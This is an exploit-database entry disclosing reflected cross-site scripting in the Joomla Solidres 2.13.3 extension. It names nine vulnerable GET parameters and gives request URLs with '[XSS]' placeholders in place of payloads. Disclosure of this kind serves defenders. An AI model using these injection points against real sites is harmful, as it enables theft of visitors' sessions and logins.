5eb89a2046
5 changes to exploits/shellcodes/ghdb Joomla iProperty Real Estate 4.1.1 - Reflected XSS Joomla Solidres 2.13.3 - Reflected XSS RosarioSIS 10.8.4 - CSV Injection Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated) WordPress Plugin AN_Gradebook 5.0.1 - SQLi General Device Manager 2.5.2.2 - Buffer Overflow (SEH)
56 lines
No EOL
3 KiB
Text
56 lines
No EOL
3 KiB
Text
# Exploit Title: Joomla Solidres 2.13.3 - Reflected XSS
|
|
# Exploit Author: CraCkEr
|
|
# Date: 28/07/2023
|
|
# Vendor: Solidres Team
|
|
# Vendor Homepage: http://solidres.com/
|
|
# Software Link: https://extensions.joomla.org/extension/vertical-markets/booking-a-reservations/solidres/
|
|
# Demo: http://demo.solidres.com/joomla
|
|
# Version: 2.13.3
|
|
# Tested on: Windows 10 Pro
|
|
# Impact: Manipulate the content of the site
|
|
|
|
|
|
## Greetings
|
|
|
|
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
|
|
CryptoJob (Twitter) twitter.com/0x0CryptoJob
|
|
|
|
|
|
## Description
|
|
|
|
The attacker can send to victim a link containing a malicious URL in an email or instant message
|
|
can perform a wide variety of actions, such as stealing the victim's session token or login credentials
|
|
|
|
|
|
GET parameter 'show' is vulnerable to XSS
|
|
GET parameter 'reviews' is vulnerable to XSS
|
|
GET parameter 'type_id' is vulnerable to XSS
|
|
GET parameter 'distance' is vulnerable to XSS
|
|
GET parameter 'facilities' is vulnerable to XSS
|
|
GET parameter 'categories' is vulnerable to XSS
|
|
GET parameter 'prices' is vulnerable to XSS
|
|
GET parameter 'location' is vulnerable to XSS
|
|
GET parameter 'Itemid' is vulnerable to XSS
|
|
|
|
|
|
https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=d2tff&task=hub.search&ordering=score&direction=desc&type_id=0&show=[XSS]
|
|
|
|
https://website/joomla/greenery_hub/index.php?option=com_solidres&task=hub.updateFilter&location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&reviews=[XSS]&facilities=18&
|
|
|
|
https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=d2tff&task=hub.search&ordering=score&direction=desc&type_id=[XSS]
|
|
|
|
https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=[XSS]&facilities=14
|
|
|
|
https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&facilities=[XSS]
|
|
|
|
https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-25&distance=0-25&categories=[XSS]
|
|
|
|
https://website/joomla/greenery_hub/index.php?option=com_solidres&task=hub.updateFilter&location=d2tff&ordering=distance&direction=asc&prices=[XSS]
|
|
|
|
https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=[XSS]&task=hub.search&ordering=score&direction=desc&type_id=11
|
|
|
|
https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=[XSS]&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&facilities=14
|
|
|
|
|
|
|
|
[-] Done |